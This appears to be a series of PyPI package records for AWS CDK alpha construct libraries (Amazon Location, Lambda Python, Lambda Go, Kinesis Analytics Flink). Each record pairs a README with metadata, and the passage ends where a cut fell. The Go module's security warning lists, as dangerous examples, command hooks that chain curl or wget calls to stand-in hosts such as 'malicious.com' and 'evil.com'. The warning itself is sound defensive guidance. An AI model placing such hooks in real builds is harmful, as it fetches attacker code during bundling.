An API key is a key value associated with specific Amazon Location Service resources or APIs in your AWS account, and with specific actions that you can perform on those resources. You can use an API key in your application to make unauthenticated calls to the Amazon Location APIs for those resources. For more information, see [Use API keys to authenticate](https://docs.aws.amazon.com/location/latest/developerguide/using-apikeys.html).

To create an API key, define an `ApiKey`:

```python
location.ApiKey(self, "APIKeyAny",
    # specify allowed actions
    allow_maps_actions=[location.AllowMapsAction.GET_STATIC_MAP],
    allow_places_actions=[location.AllowPlacesAction.GET_PLACE],
    allow_routes_actions=[location.AllowRoutesAction.CALCULATE_ISOLINES]
)
```

> Note: The `ApiKey` construct only supports [Enhanced Places, Routes, and Maps](https://aws.amazon.com/blogs/aws/announcing-new-apis-for-amazon-location-service-routes-places-and-maps/). This API key grants access to AWS-managed Places, Routes, and Maps.

## Legacy Resources

AWS has released new [Enhanced Places, Routes, and Maps](https://aws.amazon.com/about-aws/whats-new/2024/11/amazon-location-service-enhanced-places-routes-maps/?nc1=h_ls). Since these use AWS-managed resources, users no longer need to create Maps, Places, and Routes resources themselves. As a result, the following constructs are now considered legacy. For more information, see the [developer guide](https://docs.aws.amazon.com/location/latest/developerguide/what-is.html).

### Map

The Amazon Location Service Map resource gives you access to the underlying basemap data for a map.
You use the Map resource with a map rendering library to add an interactive map to your application. You can add other functionality to your map, such as markers (or pins), routes, and polygon areas, as needed for your application. For information about how to use map resources in practice, see [Using Amazon Location Maps in your application](https://docs.aws.amazon.com/location/latest/developerguide/using-maps.html).

To create a map, define a `Map`:

```python
location.Map(self, "Map",
    map_name="my-map",
    style=location.Style.VECTOR_ESRI_NAVIGATION,
    custom_layers=[location.CustomLayer.POI]
)
```

Use the `grant()` or `grantRendering()` method to grant the given identity permissions to perform actions on the map:

```python
# role: iam.Role

map = location.Map(self, "Map",
    style=location.Style.VECTOR_ESRI_NAVIGATION
)

map.grant_rendering(role)
```

### Place Index

A key function of Amazon Location Service is the ability to search geolocation information. Amazon Location provides this functionality via the Place index resource. The place index includes which [data provider](https://docs.aws.amazon.com/location/latest/developerguide/what-is-data-provider.html) to use for the search.

To create a place index, define a `PlaceIndex`:

```python
location.PlaceIndex(self, "PlaceIndex",
    place_index_name="MyPlaceIndex",  # optional, defaults to a generated name
    data_source=location.DataSource.HERE
)
```

Use the `grant()` or `grantSearch()` method to grant the given identity permissions to perform actions on the place index:

```python
# role: iam.Role

place_index = location.PlaceIndex(self, "PlaceIndex")
place_index.grant_search(role)
```

### Route Calculator

Route calculator resources allow you to find routes and estimate travel time based on up-to-date road network and live traffic information from your chosen data provider. For more information, see [Routes](https://docs.aws.amazon.com/location/latest/developerguide/route-concepts.html).

To create a route calculator, define a `RouteCalculator`:

```python
location.RouteCalculator(self, "RouteCalculator",
    route_calculator_name="MyRouteCalculator",  # optional, defaults to a generated name
    data_source=location.DataSource.ESRI
)
```

Use the `grant()` or `grantRead()` method to grant the given identity permissions to perform actions on the route calculator:

```python
# role: iam.Role

route_calculator = location.RouteCalculator(self, "RouteCalculator",
    data_source=location.DataSource.ESRI
)

route_calculator.grant_read(role)
```
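The `grant()` method mentioned above can also be used directly when a convenience method such as `grantRead()` does not cover the permission you need. A minimal sketch, assuming `grant()` takes an IAM grantee followed by explicit action names; the `geo:CalculateRoute` action string is an illustrative assumption, not taken from this module's docs:

```python
# role: iam.Role
# route_calculator: location.RouteCalculator

# Hypothetical: grant a single, explicitly named action instead of the
# grantRead() bundle. Verify the action name against the Amazon Location
# API reference before relying on it.
route_calculator.grant(role, "geo:CalculateRoute")
```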
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:10.685031
aws_cdk_aws_location_alpha-2.239.0a0.tar.gz
122,321
dc/27/29c9987d961c1920f11b289442873eb78dbf2f09ece973c8f334558a9e50/aws_cdk_aws_location_alpha-2.239.0a0.tar.gz
source
sdist
null
false
e82b76da2d6e6bba343ca2485ee31f9b
7bf1560b2ac105b07243373851d2efda7b32cb989485ed2b9b583facdfcf2a44
dc2729c9987d961c1920f11b289442873eb78dbf2f09ece973c8f334558a9e50
null
[]
0
2.1
aws-cdk.aws-lambda-python-alpha
2.239.0a0
The CDK Construct Library for AWS Lambda in Python
# Amazon Lambda Python Library

<!--BEGIN STABILITY BANNER-->

---

![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge)

> The APIs of higher level constructs in this module are experimental and under active development.
> They are subject to non-backward compatible changes or removal in any future version. These are
> not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be
> announced in the release notes. This means that while you may use them, you may need to update
> your source code when upgrading to a newer version of this package.

---

<!--END STABILITY BANNER-->

This library provides constructs for Python Lambda functions.

To use this module, you will need to have Docker installed.

## Python Function

Define a `PythonFunction`:

```python
python.PythonFunction(self, "MyFunction",
    entry="/path/to/my/function",  # required
    runtime=Runtime.PYTHON_3_8,  # required
    index="my_index.py",  # optional, defaults to 'index.py'
    handler="my_exported_func"
)
```

All other properties of `lambda.Function` are supported; see also the [AWS Lambda construct library](https://github.com/aws/aws-cdk/tree/main/packages/aws-cdk-lib/aws-lambda).

## Python Layer

You may create a python-based lambda layer with `PythonLayerVersion`. If `PythonLayerVersion` detects a `requirements.txt`, `Pipfile`, or `poetry.lock` with the associated `pyproject.toml` at the entry path, then `PythonLayerVersion` will include the dependencies inline with your code in the layer.
Define a `PythonLayerVersion`:

```python
python.PythonLayerVersion(self, "MyLayer",
    entry="/path/to/my/layer"
)
```

A layer can also be used as a part of a `PythonFunction`:

```python
python.PythonFunction(self, "MyFunction",
    entry="/path/to/my/function",
    runtime=Runtime.PYTHON_3_8,
    layers=[
        python.PythonLayerVersion(self, "MyLayer",
            entry="/path/to/my/layer"
        )
    ]
)
```

## Packaging

If `requirements.txt`, `Pipfile`, `uv.lock` or `poetry.lock` exists at the entry path, the construct will handle installing all required modules in a [Lambda compatible Docker container](https://gallery.ecr.aws/sam/build-python3.13) according to the `runtime` and with the Docker platform based on the target architecture of the Lambda function.

Python bundles are only recreated and published when a file in a source directory has changed. Therefore (and as a general best-practice), it is highly recommended to commit a lockfile with a list of all transitive dependencies and their exact versions. This will ensure that when any dependency version is updated, the bundle asset is recreated and uploaded. To that end, we recommend using [`pipenv`], [`uv`] or [`poetry`], which have lockfile support.

* [`pipenv`](https://pipenv-fork.readthedocs.io/en/latest/basics.html#example-pipfile-lock)
* [`poetry`](https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control)
* [`uv`](https://docs.astral.sh/uv/concepts/projects/sync/#exporting-the-lockfile)

Packaging is executed using the `Packaging` class, which:

1. Infers the packaging type based on the files present.
2. If it sees a `Pipfile`, `uv.lock` or a `poetry.lock` file, it exports it to a compatible `requirements.txt` file with credentials (if they're available in the source files or in the bundling container).
3. Installs dependencies using `pip` or `uv`.
4. Copies the dependencies into an asset that is bundled for the Lambda package.

**Lambda with a requirements.txt**

```plaintext
.
├── lambda_function.py # exports a function named 'handler'
├── requirements.txt # has to be present at the entry path
```

**Lambda with a Pipfile**

```plaintext
.
├── lambda_function.py # exports a function named 'handler'
├── Pipfile # has to be present at the entry path
├── Pipfile.lock # your lock file
```

**Lambda with a poetry.lock**

```plaintext
.
├── lambda_function.py # exports a function named 'handler'
├── pyproject.toml # your poetry project definition
├── poetry.lock # your poetry lock file has to be present at the entry path
```

**Lambda with a uv.lock**

Reference: https://docs.astral.sh/uv/concepts/projects/layout/

```plaintext
.
├── lambda_function.py # exports a function named 'handler'
├── pyproject.toml # your project definition
├── uv.lock # your uv lock file has to be present at the entry path
├── .python-version # this file is ignored, python version is configured via Runtime
```

**Excluding source files**

You can exclude files from being copied using the optional bundling string array parameter `assetExcludes`:

```python
python.PythonFunction(self, "function",
    entry="/path/to/poetry-function",
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        # translates to `rsync --exclude='.venv'`
        asset_excludes=[".venv"]
    )
)
```

**Including hashes**

You can include hashes in `poetry` using the optional boolean parameter `poetryIncludeHashes`:

```python
python.PythonFunction(self, "function",
    entry="/path/to/poetry-function",
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        poetry_include_hashes=True
    )
)
```

**Excluding URLs**

You can exclude URLs in `poetry` using the optional boolean parameter `poetryWithoutUrls`:

```python
python.PythonFunction(self, "function",
    entry="/path/to/poetry-function",
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        poetry_without_urls=True
    )
)
```

## Custom Bundling

Custom bundling can be performed by passing in additional build arguments that point to index URLs to private repos, or
by using an entirely custom Docker image for bundling dependencies. The build args currently supported are:

* `PIP_INDEX_URL`
* `PIP_EXTRA_INDEX_URL`
* `HTTPS_PROXY`

Additional build args for bundling that refer to PyPI indexes can be specified as:

```python
entry = "/path/to/function"

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        build_args={
            "PIP_INDEX_URL": "https://your.index.url/simple/",
            "PIP_EXTRA_INDEX_URL": "https://your.extra-index.url/simple/"
        }
    )
)
```

If using a custom Docker image for bundling, the dependencies are installed with `pip`, `pipenv` or `poetry` by using the `Packaging` class. A different bundling Docker image that is in the same directory as the function can be specified as:

```python
entry = "/path/to/function"
image = DockerImage.from_build(entry)

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(image=image)
)
```

You can set additional Docker options to configure the build environment:

```python
from aws_cdk import DockerVolume

entry = "/path/to/function"

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        network="host",
        security_opt="no-new-privileges",
        user="user:group",
        volumes_from=["777f7dc92da7"],
        volumes=[DockerVolume(host_path="/host-path", container_path="/container-path")]
    )
)
```

## Custom Bundling with Code Artifact

To use a Code Artifact PyPI repo, the `PIP_INDEX_URL` for bundling the function can be customized (requires AWS CLI in the build environment):

```python
import subprocess

entry = "/path/to/function"
domain = "my-domain"
domain_owner = "111122223333"
repo_name = "my_repo"
region = "us-east-1"

# Fetch a temporary auth token via the AWS CLI
code_artifact_auth_token = subprocess.check_output(
    f"aws codeartifact get-authorization-token --domain {domain} "
    f"--domain-owner {domain_owner} --query authorizationToken --output text",
    shell=True, text=True
).strip()
index_url = f"https://aws:{code_artifact_auth_token}@{domain}-{domain_owner}.d.codeartifact.{region}.amazonaws.com/pypi/{repo_name}/simple/"

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        environment={"PIP_INDEX_URL": index_url}
    )
)
```

The index URL and the token are only used during bundling and thus not included in the final asset. Setting only the `PIP_INDEX_URL` or `PIP_EXTRA_INDEX_URL` environment variable should work for accessing private Python repositories with `pip`, `pipenv` and `poetry` based dependencies.

If you also want to use the Code Artifact repo for building the base Docker image for bundling, use `buildArgs`. However, note that setting custom build args for bundling will force the base bundling image to be rebuilt every time (i.e. skip the Docker cache). Build args can be customized as:

```python
import subprocess

entry = "/path/to/function"
domain = "my-domain"
domain_owner = "111122223333"
repo_name = "my_repo"
region = "us-east-1"

code_artifact_auth_token = subprocess.check_output(
    f"aws codeartifact get-authorization-token --domain {domain} "
    f"--domain-owner {domain_owner} --query authorizationToken --output text",
    shell=True, text=True
).strip()
index_url = f"https://aws:{code_artifact_auth_token}@{domain}-{domain_owner}.d.codeartifact.{region}.amazonaws.com/pypi/{repo_name}/simple/"

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        build_args={"PIP_INDEX_URL": index_url}
    )
)
```

## Command hooks

It is possible to run additional commands by specifying the `commandHooks` prop:

```python
entry = "/path/to/function"

# An object with before_bundling/after_bundling methods implements the hooks
class CommandHooks:
    # run tests before bundling
    def before_bundling(self, input_dir, output_dir):
        return ["pytest"]

    def after_bundling(self, input_dir, output_dir):
        return ["pylint"]

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        command_hooks=CommandHooks()
    )
)
```

The following hooks are available:

* `beforeBundling`: runs before all bundling commands
* `afterBundling`: runs after all bundling commands

They all receive the directory containing the dependencies file (`inputDir`) and the directory where the bundled asset will be output (`outputDir`). They must return an array of commands to run. Commands are chained with `&&`.

The commands will run in the environment in which bundling occurs: inside the container for Docker bundling or on the host OS for local bundling.

## Docker based bundling in complex Docker configurations

By default the input and output of Docker based bundling is handled via bind mounts. In situations where this does not work, like Docker-in-Docker setups or when using a remote Docker socket, you can configure an alternative, but slower, variant that also works in these situations.

```python
entry = "/path/to/function"

python.PythonFunction(self, "function",
    entry=entry,
    runtime=Runtime.PYTHON_3_8,
    bundling=python.BundlingOptions(
        bundling_file_access=BundlingFileAccess.VOLUME_COPY
    )
)
```

## Troubleshooting

### Containerfile: no such file or directory

If you are on a Mac, using [Finch](https://github.com/runfinch/finch) instead of Docker, and see an error like this:

```txt
lstat /private/var/folders/zx/d5wln9n10sn0tcj1v9798f1c0000gr/T/jsii-kernel-9VYgrO/node_modules/@aws-cdk/aws-lambda-python-alpha/lib/Containerfile: no such file or directory
```

That is a sign that your temporary directory has not been mapped into the Finch VM. Add the following to `~/.finch/finch.yaml`:

```yaml
additional_directories:
  - path: /private/var/folders/
  - path: /var/folders/
```

Then restart the Finch VM by running `finch vm stop && finch vm start`.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:09.779548
aws_cdk_aws_lambda_python_alpha-2.239.0a0.tar.gz
98,256
35/41/e8355b8e49e09778aec09ab35004b31dd3494bc76ef0c05a7b101ab6b5c9/aws_cdk_aws_lambda_python_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ae4bbc3e4f30e9c866bfed5e994dfe5c
ef4c3cc6100c383a654f9886e799f6529cc69997c9ec876449a40d52307eb7c6
3541e8355b8e49e09778aec09ab35004b31dd3494bc76ef0c05a7b101ab6b5c9
null
[]
0
2.1
aws-cdk.aws-lambda-go-alpha
2.239.0a0
The CDK Construct Library for AWS Lambda in Golang
# Amazon Lambda Golang Library

<!--BEGIN STABILITY BANNER-->

---

![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge)

> The APIs of higher level constructs in this module are experimental and under active development.
> They are subject to non-backward compatible changes or removal in any future version. These are
> not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be
> announced in the release notes. This means that while you may use them, you may need to update
> your source code when upgrading to a newer version of this package.

---

<!--END STABILITY BANNER-->

This library provides constructs for Golang Lambda functions.

To use this module you will need to have either `Go` (`go1.11` or later) or `Docker` installed. See [Local Bundling](#local-bundling)/[Docker Bundling](#docker-bundling) for more information.

This module also requires that your Golang application is using a Go version >= 1.11 and is using [Go modules](https://golang.org/ref/mod).

## Go Function

Define a `GoFunction`:

```python
go.GoFunction(self, "handler",
    entry="lambda-app/cmd/api"
)
```

By default, if `entry` points to a directory, then the construct will assume there is a Go entry file (i.e. `main.go`). Let's look at an example Go project:

```bash
lambda-app
├── cmd
│   └── api
│       └── main.go
├── go.mod
├── go.sum
├── pkg
│   ├── auth
│   │   └── auth.go
│   └── middleware
│       └── middleware.go
└── vendor
    ├── github.com
    │   └── aws
    │       └── aws-lambda-go
    └── modules.txt
```

With the above layout I could provide the `entry` as either `lambda-app/cmd/api` or `lambda-app/cmd/api/main.go`; either will work. When the construct builds the golang binary, this will be translated to `go build ./cmd/api` and `go build ./cmd/api/main.go` respectively.
The construct will figure out where it needs to run the `go build` command from; in this example it would be from the `lambda-app` directory. It does this by determining the [mod file path](#mod-file-path), which is explained in the next section.

### mod file path

The `GoFunction` tries to automatically determine your project root, that is the root of your golang project. This is usually where the top level `go.mod` file or `vendor` folder of your project is located. When bundling in a Docker container, the `moduleDir` is used as the source (`/asset-input`) for the volume mounted in the container.

The CDK will walk up parent folders starting from the current working directory until it finds a folder containing a `go.mod` file.

Alternatively, you can specify the `moduleDir` prop manually. In this case you need to ensure that this path includes `entry` and any module/dependencies used by your function. Otherwise bundling will fail.

## Runtime

The `GoFunction` can be used with either the `GO_1_X` runtime or the provided runtimes (`PROVIDED`/`PROVIDED_AL2`). By default it will use the `PROVIDED_AL2` runtime. The `GO_1_X` runtime does not support things like [Lambda Extensions](https://docs.aws.amazon.com/lambda/latest/dg/using-extensions.html), whereas the provided runtimes do. The [aws-lambda-go](https://github.com/aws/aws-lambda-go) library has built in support for the provided runtime as long as you name the handler `bootstrap` (which we do by default).

## Dependencies

The construct will attempt to figure out how to handle the dependencies for your function. It will do this by determining whether or not you are vendoring your dependencies. It makes this determination by looking to see if there is a `vendor` folder at the [mod file path](#mod-file-path). With this information the construct can determine what commands to run. You will generally fall into two scenarios:

1. You are using vendoring (indicated by the presence of a `vendor` folder). In this case `go build` will be run with `-mod=vendor` set.
2. You are not using vendoring (indicated by the absence of a `vendor` folder). If you are not vendoring then `go build` will be run without `-mod=vendor`, since the default behavior is to download dependencies.

All other properties of `lambda.Function` are supported; see also the [AWS Lambda construct library](https://github.com/aws/aws-cdk/tree/main/packages/aws-cdk-lib/aws-lambda).

## Environment

By default the following environment variables are set for you:

* `GOOS=linux`
* `GOARCH`: based on the target architecture of the Lambda function
* `GO111MODULE=on`

Use the `environment` prop to define additional environment variables when go runs:

```python
go.GoFunction(self, "handler",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        environment={
            "HELLO": "WORLD"
        }
    )
)
```

## Local Bundling

If `Go` is installed locally and the version is >= `go1.11` then it will be used to bundle your code in your environment. Otherwise, bundling will happen in a [Lambda compatible Docker container](https://gallery.ecr.aws/sam/build-provided.al2023) with the Docker platform based on the target architecture of the Lambda function.

For macOS the recommended approach is to install `Go`, as Docker volume performance is really poor. `Go` can be installed by following the [installation docs](https://golang.org/doc/install).

## Docker

To force bundling in a docker container even if `Go` is available in your environment, set the `forceDockerBundling` prop to `true`. This is useful if you want to make sure that your function is built in a consistent Lambda compatible environment.
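The forced-Docker behavior described above can be sketched as follows. The snake_case property name below is an assumed Python rendering of the `forceDockerBundling` prop, so verify the exact spelling against the module's generated API reference:

```python
# Sketch only: force bundling inside Docker even when a suitable local Go
# toolchain is available. `forced_docker_bundling` is an assumed name for
# the forceDockerBundling prop described above.
go.GoFunction(self, "handler",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        forced_docker_bundling=True
    )
)
```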
Use the `buildArgs` prop to pass build arguments when building the bundling image:

```python
go.GoFunction(self, "handler",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        build_args={
            "HTTPS_PROXY": "https://127.0.0.1:3001"
        }
    )
)
```

Use the `bundling.dockerImage` prop to use a custom bundling image:

```python
go.GoFunction(self, "handler",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        docker_image=DockerImage.from_build("/path/to/Dockerfile")
    )
)
```

Use the `bundling.goBuildFlags` prop to pass additional build flags to `go build`:

```python
go.GoFunction(self, "handler",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        go_build_flags=["-ldflags \"-s -w\""]
    )
)
```

**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.

By default this construct doesn't use any Go module proxies. This is contrary to a standard Go installation, which would use the Google proxy by default.
To recreate that behavior, do the following:

```python
go.GoFunction(self, "GoFunction",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        go_proxies=[go.GoFunction.GOOGLE_GOPROXY, "direct"]
    )
)
```

You can set additional Docker options to configure the build environment:

```python
from aws_cdk import DockerVolume

go.GoFunction(self, "GoFunction",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        network="host",
        security_opt="no-new-privileges",
        user="user:group",
        volumes_from=["777f7dc92da7"],
        volumes=[DockerVolume(host_path="/host-path", container_path="/container-path")]
    )
)
```

## Command hooks

It is possible to run additional commands by specifying the `commandHooks` prop:

```python
# Run additional commands on a GoFunction via the `commandHooks` property
class CommandHooks:
    # run tests before bundling
    def before_bundling(self, input_dir, output_dir):
        return ["go test ./cmd/api -v"]

    def after_bundling(self, input_dir, output_dir):
        return ['echo "Build complete"']

go.GoFunction(self, "handler",
    entry="cmd/api",
    bundling=go.BundlingOptions(
        command_hooks=CommandHooks()
    )
)
```

The following hooks are available:

* `beforeBundling`: runs before all bundling commands
* `afterBundling`: runs after all bundling commands

They all receive the directory containing the `go.mod` file (`inputDir`) and the directory where the bundled asset will be output (`outputDir`). They must return an array of commands to run. Commands are chained with `&&`.

The commands will run in the environment in which bundling occurs: inside the container for Docker bundling or on the host OS for local bundling.

### ⚠️ Security Considerations

**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:

**Safe patterns (cross-platform):**

```python
class SafeCommandHooks:
    def before_bundling(self, input_dir, output_dir):
        return [
            "go test ./...",        # ✅ Standard Go commands work on all OS
            "go mod tidy",          # ✅ Go module commands
            "make clean",           # ✅ Build tools (if available)
            'echo "Building app"',  # ✅ Simple output with quotes
        ]

    def after_bundling(self, input_dir, output_dir):
        return ['echo "Build complete"']

go.GoFunction(self, "SafeFunction",
    entry="cmd/api",
    bundling=go.BundlingOptions(command_hooks=SafeCommandHooks())
)
```

**Dangerous patterns to avoid:**

*Windows-specific dangers:*

```python
# ❌ Windows-specific dangers
class UnsafeWindowsHooks:
    def before_bundling(self, input_dir, output_dir):
        return [
            "go test & curl.exe malicious.com",  # ❌ Command chaining with &
            "echo %USERPROFILE%",                # ❌ Environment variable expansion
            'powershell -Command "..."',         # ❌ PowerShell execution
        ]

    def after_bundling(self, input_dir, output_dir):
        return []

go.GoFunction(self, "UnsafeWindowsFunction",
    entry="cmd/api",
    bundling=go.BundlingOptions(command_hooks=UnsafeWindowsHooks())
)
```

*Unix/Linux/macOS dangers:*

```python
# ❌ Unix/Linux/macOS dangers
class UnsafeUnixHooks:
    def before_bundling(self, input_dir, output_dir):
        return [
            "go test; curl malicious.com",  # ❌ Command chaining with ;
            "echo $(whoami)",               # ❌ Command substitution
            'bash -c "wget evil.com"',      # ❌ Shell execution
        ]

    def after_bundling(self, input_dir, output_dir):
        return []

go.GoFunction(self, "UnsafeUnixFunction",
    entry="cmd/api",
    bundling=go.BundlingOptions(command_hooks=UnsafeUnixHooks())
)
```

**When using third-party constructs** that include `GoFunction`:

* Review the construct's source code before use
* Verify what commands it executes via `commandHooks` and `goBuildFlags`
* Only use constructs from trusted publishers
* Test in isolated environments first

The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected. For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).

## Security Best Practices

### Third-Party Construct Safety

When using third-party CDK constructs that utilize `GoFunction`, exercise caution:

1.
**Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
2. **Verify publishers** - Use constructs only from trusted, verified sources
3. **Pin versions** - Use exact versions to prevent supply chain attacks
4. **Isolated testing** - Test third-party constructs in sandboxed environments

**Before using any third-party construct:**

* Review the construct's source code on GitHub or npm
* Search for `commandHooks` and `goBuildFlags` usage in the code
* Verify no dangerous command patterns are present
* Use exact version pinning to prevent supply chain attacks

The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.

## Additional considerations

Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter. By default this parameter is set to `AssetHashType.OUTPUT`, which means that the CDK will calculate the asset hash (and determine whether or not your code has changed) based on the Golang executable that is created.

If you specify `AssetHashType.SOURCE`, the CDK will calculate the asset hash by looking at the folder that contains your `go.mod` file. If you are deploying a single Lambda function, or you want to redeploy all of your functions if anything changes, then `AssetHashType.SOURCE` will probably work.

For example, if my app looked like this:

```bash
lambda-app
├── cmd
│   └── api
│       └── main.go
├── go.mod
├── go.sum
└── pkg
    └── auth
        └── auth.go
```

With this structure I would provide the `entry` as `cmd/api`, which means that the CDK will determine that the project root is `lambda-app` (it contains the `go.mod` file). Since I only have a single Lambda function, and any update to files within the `lambda-app` directory should trigger a new deploy, I could specify `AssetHashType.SOURCE`.
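The single-function case above can be sketched as follows, assuming the hash type is set via an `asset_hash_type` option on the bundling options (check the module's API reference for where the parameter is actually exposed):

```python
from aws_cdk import AssetHashType

# Sketch: redeploy whenever anything under the go.mod folder changes.
# Passing asset_hash_type through BundlingOptions is an assumption here;
# consult the construct's API reference for the exact parameter location.
go.GoFunction(self, "handler",
    entry="lambda-app/cmd/api",
    bundling=go.BundlingOptions(
        asset_hash_type=AssetHashType.SOURCE
    )
)
```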
On the other hand, if I had a project that deployed multiple Lambda functions, for example:

```bash
lambda-app
├── cmd
│   ├── api
│   │   └── main.go
│   └── anotherApi
│       └── main.go
├── go.mod
├── go.sum
└── pkg
    ├── auth
    │   └── auth.go
    └── middleware
        └── middleware.go
```

Then I would most likely want `AssetHashType.OUTPUT`. With `OUTPUT` the CDK will only recognize changes if the Golang executable has changed, and Go only includes dependencies that are used in the executable. So in this case if `cmd/api` used the `auth` & `middleware` packages, but `cmd/anotherApi` did not, then an update to `auth` or `middleware` would only trigger an update to the `cmd/api` Lambda Function.

## Docker based bundling in complex Docker configurations

By default the input and output of Docker based bundling is handled via bind mounts. In situations where this does not work, like Docker-in-Docker setups or when using a remote Docker socket, you can configure an alternative, but slower, variant that also works in these situations.

```python
go.GoFunction(self, "GoFunction",
    entry="app/cmd/api",
    bundling=go.BundlingOptions(
        bundling_file_access=BundlingFileAccess.VOLUME_COPY
    )
)
```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:08.938377
aws_cdk_aws_lambda_go_alpha-2.239.0a0.tar.gz
102,266
f6/21/5c2ffa343b7065a0484beaa03e18d8c8c86bfaf366495e4266988bfd86f0/aws_cdk_aws_lambda_go_alpha-2.239.0a0.tar.gz
source
sdist
null
false
0b0bcf48cd51e4eea963c463a2a0b61e
9e9b5162d18d5f5bca9b4db904634ebc8329a3bd633fe522293509bb7e8ac7ed
f6215c2ffa343b7065a0484beaa03e18d8c8c86bfaf366495e4266988bfd86f0
null
[]
0
2.1
aws-cdk.aws-kinesisanalytics-flink-alpha
2.239.0a0
A CDK Construct Library for Kinesis Analytics Flink applications
# Kinesis Analytics Flink <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This package provides constructs for creating Kinesis Analytics Flink applications. To learn more about using managed Flink applications, see the [AWS developer guide](https://docs.aws.amazon.com/kinesisanalytics/latest/java/). ## Creating Flink Applications To create a new Flink application, use the `Application` construct: ```python import os.path as path import aws_cdk.integ_tests_alpha as integ import aws_cdk as core import aws_cdk.aws_cloudwatch as cloudwatch import aws_cdk.aws_kinesisanalytics_flink_alpha as flink app = core.App() stack = core.Stack(app, "FlinkAppTest") flink_runtimes = [flink.Runtime.FLINK_1_6, flink.Runtime.FLINK_1_8, flink.Runtime.FLINK_1_11, flink.Runtime.FLINK_1_13, flink.Runtime.FLINK_1_15, flink.Runtime.FLINK_1_18, flink.Runtime.FLINK_1_19, flink.Runtime.FLINK_1_20 ] for runtime in flink_runtimes: flink_app = flink.Application(stack, f"App-{runtime.value}", code=flink.ApplicationCode.from_asset(path.join(path.dirname(__file__), "code-asset")), runtime=runtime ) cloudwatch.Alarm(stack, f"Alarm-{runtime.value}", metric=flink_app.metric_full_restarts(), evaluation_periods=1, threshold=3 ) integ.IntegTest(app, "ApplicationTest", test_cases=[stack] ) ``` The `code` property can 